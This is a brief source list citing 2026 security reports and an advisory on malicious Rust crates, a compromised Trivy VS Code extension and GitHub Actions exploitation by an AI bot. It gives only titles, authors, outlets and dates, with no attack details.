Sources: Kirill Boychenko, Socket Threat Research Team, 5 Malicious Rust Crates Posed as Time Utilities to Exfiltrate .env Files, socket.dev, March 10, 2026. Peter van der Zee and Philipp Burckhardt, Socket, Unauthorized AI Agent Execution Code Published to OpenVSX in Aqua Trivy VS Code Extension, socket.dev, March 2, 2026. Ravie Lakshmanan, Five Malicious Rust Crates and AI Bot Exploit CI/CD Pipelines to Steal Developer Secrets, The Hacker News, March 11, 2026. StepSecurity, hackerbot-claw GitHub Actions Exploitation, stepsecurity.io, 2026. GitHub Security Advisory GHSA-8mr6-gf9x-j8qg (CVE-2026-28353), aquasecurity/trivy-vscode-extension.